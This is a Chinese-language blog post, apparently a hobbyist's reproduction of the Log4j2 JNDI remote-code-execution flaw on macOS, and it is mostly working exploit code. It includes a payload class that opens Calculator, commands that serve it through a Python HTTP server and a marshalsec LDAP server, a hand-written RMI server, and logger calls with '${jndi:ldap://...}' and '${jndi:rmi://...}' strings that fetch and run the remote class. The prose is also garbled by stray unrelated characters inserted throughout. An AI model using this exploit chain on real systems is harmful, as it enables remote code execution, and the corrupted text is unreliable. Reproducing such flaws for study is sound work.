背景
?Apache Log4j2是一個(gè)基于Java的日志記錄工具楼入,該工具重寫了Log4j框架,并且引入了大量豐富的特性久免,Apache log4j-2是Log4j的升級(jí)版浅辙,這個(gè)日志框架被大量用于業(yè)務(wù)系統(tǒng)開發(fā),用來記錄日志信息阎姥。在大多數(shù)情況下记舆,開發(fā)者可能會(huì)將用戶輸入導(dǎo)致的錯(cuò)誤信息寫入日志中,而攻擊者則可以利用此特性通過該漏洞構(gòu)造特殊的數(shù)據(jù)請(qǐng)求包呼巴,最終觸發(fā)遠(yuǎn)程代碼執(zhí)行泽腮。
?本文章主要是處于個(gè)人興趣想去復(fù)現(xiàn)一下 Log4j2的漏洞,事先聲明本人對(duì)安全領(lǐng)域一竅不通衣赶,只是之前碰巧讀過部分 Log4j 的代碼诊赊,所以有興趣研究下這個(gè)問題的根源,當(dāng)然這篇文章只是告訴大家怎么去復(fù)現(xiàn)這個(gè)問題府瞄。關(guān)于 Log4j2部分的源碼得等下篇文章了碧磅。
環(huán)境介紹
- 操作系統(tǒng):macOS Catalina
- java version "1.8.0_191"
- LDAP服務(wù)端
- python3.x
- 手寫 RMI 服務(wù)端以及測(cè)試代碼。
LDAP 方式復(fù)現(xiàn)
- 1.手寫hack 代碼用于啟動(dòng)mac 系統(tǒng)的計(jì)算器 java 代碼遵馆,編譯成class 文件鲸郊。
- 2.在 class 目錄通過 python3 -m http.server 啟動(dòng)服務(wù)后能夠通過 http 協(xié)議訪到 hack 的 class 文件。
- 3.通過marshalsec啟動(dòng)一個(gè) LDAP 服務(wù)器货邓,代碼開源可以手動(dòng)各種操作秆撮,編譯成 jar 包參考LDAP服務(wù)端。
- 4.通過 log4j2的打印日志然后訪問 hack 代碼啟動(dòng)本地計(jì)算器换况。
public class BugFinder {
public BugFinder() {
try {
System.out.println("執(zhí)行漏洞代碼");
String[] commands = {"open", "/System/Applications/Calculator.app"};
Process pc = Runtime.getRuntime().exec(commands);
pc.waitFor();
System.out.println("完成執(zhí)行漏洞代碼");
} catch (Exception e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
BugFinder bugFinder = new BugFinder();
}
}
- hack 的代碼負(fù)責(zé)啟動(dòng)mac系統(tǒng)的計(jì)算器职辨。
python3 -m http.server 8000
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#BugFinder"
- 在 hack 的class文件所在目錄通 python3啟動(dòng)http服務(wù)暴露 hack 的 class 文件。
- 通過marshalsec的開源軟件啟動(dòng) LDAP 服務(wù)戈二,參考LDAP服務(wù)端舒裤。
package com.bug;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class BugTester {
private static final Logger logger = LogManager.getLogger(BugTester.class);
public static void main(String[] args) {
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
logger.error("${jndi:ldap://192.168.0.3:1389/BugFinder}");
try {
Thread.sleep(1000);
} catch (Exception e) {
}
}
}
- 通過 log4j2的打印日志${jndi:ldap://192.168.0.3:1389/BugFinder}喚起本地計(jì)算器。
- 不同的 JDK 對(duì)于com.sun.jndi.ldap.object.trustURLCodebase的默認(rèn)值不一樣觉吭,所以為了測(cè)試統(tǒng)一設(shè)置成true 便于觸發(fā)腾供。
- 不同的 JDK 版本的默認(rèn)值可能導(dǎo)致這個(gè) bug 不會(huì)被觸發(fā)。
RMI 方式復(fù)現(xiàn)
- 1.手寫hack 代碼用于啟動(dòng)mac 系統(tǒng)的計(jì)算器 java 代碼,編譯成class 文件台腥。
- 2.手寫 RMI 的服務(wù)端代碼。
- 3.通過 log4j2的打印日志然后訪問 hack 代碼啟動(dòng)本地計(jì)算器绒北。
package com.bug;
public class BugFinder {
public BugFinder() {
try {
System.out.println("執(zhí)行漏洞代碼");
String[] commands = {"open", "/System/Applications/Calculator.app"};
Process pc = Runtime.getRuntime().exec(commands);
pc.waitFor();
System.out.println("完成執(zhí)行漏洞代碼");
} catch (Exception e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
BugFinder bugFinder = new BugFinder();
}
}
- hack 的代碼負(fù)責(zé)啟動(dòng)mac系統(tǒng)的計(jì)算器黎侈。
package com.bug;
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
public class RMIServer {
public static void main(String[] args) {
try {
LocateRegistry.createRegistry(1099);
Registry registry = LocateRegistry.getRegistry();
Reference reference = new Reference("com.bug.BugFinder",
"com.bug.BugFinder", null);
ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
registry.bind("BugFinder", referenceWrapper);
} catch (Exception e) {
e.printStackTrace();
}
}
}
- RMI 的服務(wù)端代碼,啟動(dòng)1099端口進(jìn)行監(jiān)聽闷游。對(duì)應(yīng) log4j2的日志通過"jndi:rmi://192.168.0.3:1099/BugFinder"進(jìn)行訪問呢峻汉。
- Reference的參數(shù)com.bug.BugFinder就是 hack 代碼的class 路徑。
public class BugTester {
private static final Logger logger = LogManager.getLogger(BugTester.class);
public static void main(String[] args) {
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
logger.error("${jndi:rmi://192.168.0.3:1099/BugFinder}");
try {
Thread.sleep(1000);
} catch (Exception e) {
}
}
}
- 執(zhí)行 log4j2的 error 日志脐往,參數(shù)為${jndi:rmi://192.168.0.3:1099/BugFinder}休吠,會(huì)觸發(fā)mac 系統(tǒng)打開計(jì)算器。
